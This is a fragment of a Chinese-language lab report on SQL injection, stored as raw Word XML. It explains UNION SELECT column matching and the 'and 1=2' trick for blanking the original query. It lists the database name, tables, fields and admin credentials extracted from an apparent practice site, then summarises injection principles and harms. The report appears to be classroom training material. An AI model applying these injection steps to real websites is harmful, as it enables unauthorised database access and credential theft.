            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>union</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44"/>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> selec</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>联合查询</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>语句使用错误</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="715B9DF2" w14:textId="16335C1D" w:rsidR="00D92BD0" w:rsidRPr="00E636F6" w:rsidRDefault="00D92BD0" w:rsidP="00AC260D">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>解决：</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>union</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>结果集中的列名总是等于</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">union </w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>中第一个</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>select</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>语句中的列名</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>，所以</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>联合查询前后的两个表，第一个表的字段数与第二个表的字段数必须相等</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>。而且</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>优先显示的是联合查询的第一个结果</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz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需要利用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SQL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注入漏洞，屏蔽原数据库的查询内容</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz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比如在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SQL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查询语句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id=1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之后加上</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA0CD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and 1=2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="003F52DE" w:rsidRPr="003F52D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使前半段语句为假，则不返回任何内容</w:t>
            </w:r>
            <w:r w:rsidR="003F52D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</w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="42139B16" w14:textId="77777777" w:rsidTr="00973DC7">
        <w:trPr>
          <w:trHeight w:val="5530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10AA434F" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00443E3E" w:rsidP="00A5242F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六</w:t>
            </w:r>
            <w:r w:rsidR="00125B21">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>、实验结果及分析和（或）源程序调试过程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72007503" w14:textId="63B73DF1" w:rsidR="0003786D" w:rsidRPr="00FD0EAC" w:rsidRDefault="0003786D" w:rsidP="0003786D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FD0E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对网站</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0EAC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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进行</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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注入</w:t>
            </w:r>
            <w:r w:rsidR="009C5687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，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实现对</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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以下信息的获取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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1695E8AE" w14:textId="59E0F842" w:rsidR="0003786D" w:rsidRPr="00FD0EAC" w:rsidRDefault="0003786D" w:rsidP="0003786D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FD0E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.</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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数据库名称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：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maoshe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D3F9DB5" w14:textId="63474A5C" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D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FD0E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2.</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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数据库中的所有表的名称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，以及</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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每个表中的字段数量以及字段名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552"/>
              <w:gridCol w:w="2552"/>
              <w:gridCol w:w="2552"/>
            </w:tblGrid>
            <w:tr w:rsidR="0003786D" w14:paraId="6949519E" w14:textId="77777777" w:rsidTr="0003786D">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="160E0F2A" w14:textId="121B5D82" w:rsidR="0003786D" w:rsidRPr="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D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03786D">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>表名</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="34688A50" w14:textId="50DE7557" w:rsidR="0003786D" w:rsidRPr="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D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03786D">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>字段数量</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="298EE08D" w14:textId="7A28C3F6" w:rsidR="0003786D" w:rsidRPr="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D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03786D">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>字段名</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="0003786D" w14:paraId="3FB11644" w14:textId="77777777" w:rsidTr="0003786D">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3CCD16C8" w14:textId="7FFF6525" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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 w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>admin</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="22EFBE37" w14:textId="77014E99" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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14:paraId="6261095D" w14:textId="58C47652" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="003F32EE">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>Id</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t xml:space="preserve">, </w:t>
                  </w:r>
                  <w:r w:rsidRPr="003F32EE">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>username</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t xml:space="preserve">, </w:t>
                  </w:r>
                  <w:r w:rsidRPr="003F32EE">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>password</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="0003786D" w14:paraId="24D96EF6" w14:textId="77777777" w:rsidTr="0003786D">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="07B0149C" w14:textId="2AB0461B" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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  <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>dirs</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0913595A" w14:textId="4EBD16A8" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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14:paraId="46577968" w14:textId="519C6EE0" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="003F32EE">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>paths</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="0003786D" w14:paraId="0B5F866E" w14:textId="77777777" w:rsidTr="0003786D">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4482A796" w14:textId="5B8F40C4" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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 w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>news</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="636405A0" w14:textId="471B1248" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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14:paraId="0F38A6B1" w14:textId="6AD5EFB8" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="003F32EE">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>id</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t xml:space="preserve">, </w:t>
                  </w:r>
                  <w:r w:rsidRPr="003F32EE">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>content</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="0003786D" w14:paraId="540BE9D4" w14:textId="77777777" w:rsidTr="0003786D">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="66251A2D" w14:textId="4CFBE808" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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 w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>xss</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="386A2CF4" w14:textId="74993988" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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14:paraId="5C4B691A" w14:textId="620AADDE" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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 w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>id, user, pass</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="4C9209A3" w14:textId="1BABA041" w:rsidR="0003786D" w:rsidRPr="00FD0EAC" w:rsidRDefault="0003786D" w:rsidP="0003786D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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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.</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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管理员用户密码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828"/>
              <w:gridCol w:w="3828"/>
            </w:tblGrid>
            <w:tr w:rsidR="0003786D" w14:paraId="62C4B2BB" w14:textId="77777777" w:rsidTr="0003786D">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3828" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3132D142" w14:textId="165551CE" w:rsidR="0003786D" w:rsidRPr="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D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03786D">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>usernam</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3828" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="059290AB" w14:textId="622FFEDC" w:rsidR="0003786D" w:rsidRPr="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D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03786D">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:b/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>password</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="0003786D" w14:paraId="01263E8D" w14:textId="77777777" w:rsidTr="0003786D">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3828" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2F099C22" w14:textId="671DABE6" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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Cs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>admin</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3828" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1EB782EB" w14:textId="7A208A6C" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="008C0A8D">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>hellohack</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="0003786D" w14:paraId="1ECFFCE4" w14:textId="77777777" w:rsidTr="0003786D">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3828" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="333A5E25" w14:textId="1299B839" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="003F32EE">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>ppt</w:t>
                  </w:r>
                  <w:r w:rsidRPr="003F32EE">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>领取微信</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3828" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="613A90C0" w14:textId="6A52B8EA" w:rsidR="0003786D" w:rsidRDefault="0003786D" w:rsidP="0003786D">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="008C0A8D">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>zkaqbanban</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="5BB5FB20" w14:textId="198886BD" w:rsidR="0003786D" w:rsidRPr="00FD0EAC" w:rsidRDefault="0003786D" w:rsidP="0003786D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  <w:p w14:paraId="69A6E191" w14:textId="26AF8246" w:rsidR="003749BA" w:rsidRPr="009C5687" w:rsidRDefault="009C5687" w:rsidP="00881448">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs>
              <w:ind w:right="964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SQL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注入</w:t>
            </w:r>
            <w:r w:rsidRPr="009C5687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实验总结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：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07DA3B71" w14:textId="3BBF347E" w:rsidR="00AC260D" w:rsidRDefault="005A51AC" w:rsidP="009C5687">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs>
              <w:ind w:right="964"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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1</w:t>
            </w:r>
            <w:r w:rsidR="009C5687"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.</w:t>
            </w:r>
            <w:r w:rsidR="009C5687"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原理</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EDA9F15" w14:textId="77777777" w:rsidR="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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SQL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注入漏洞的原理主要基于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SQL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语句的拼接和解析。当应用程序使用拼接的方式构建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SQL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语句时，如果未对用户输入进行严格的验证和过滤，攻击者就可以通过构造恶意的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SQL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语句，将其插入到正常的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SQL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查询中，从而改变原有的查询逻辑。当应用程序执行这些被篡改的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SQL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语句时，就会导致非预期的结果，甚至执行攻击者指定的恶意操作。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="493D9742" w14:textId="77777777" w:rsidR="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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2.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危害</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1CD609" w14:textId="5DD40E00" w:rsidR="005A51AC" w:rsidRPr="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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（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）数据泄露：攻击者可以利用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SQL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注入漏洞，读取数据库中的敏感信息，如用户密码、银行账户等，导致用户隐私泄露。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C36F34D" w14:textId="294F2F3D" w:rsidR="005A51AC" w:rsidRPr="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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（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2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）数据篡改：攻击者可以通过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SQL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注入漏洞，修改数据库中的数据，破坏数据的完整性和真实性。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</w:p>
          <w:p w14:paraId="5320AC02" w14:textId="77777777" w:rsidR="005A51AC" w:rsidRPr="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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lastRenderedPageBreak/>
              <w:t>（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3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）拒绝服务：攻击者可以通过构造大量的恶意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SQL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语句，对数据库进行高频率的访问和操作，从而耗尽系统资源，导致拒绝服务攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70CF4917" w14:textId="77777777" w:rsidR="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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3.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防御</w:t>
            </w:r>
          </w:p>
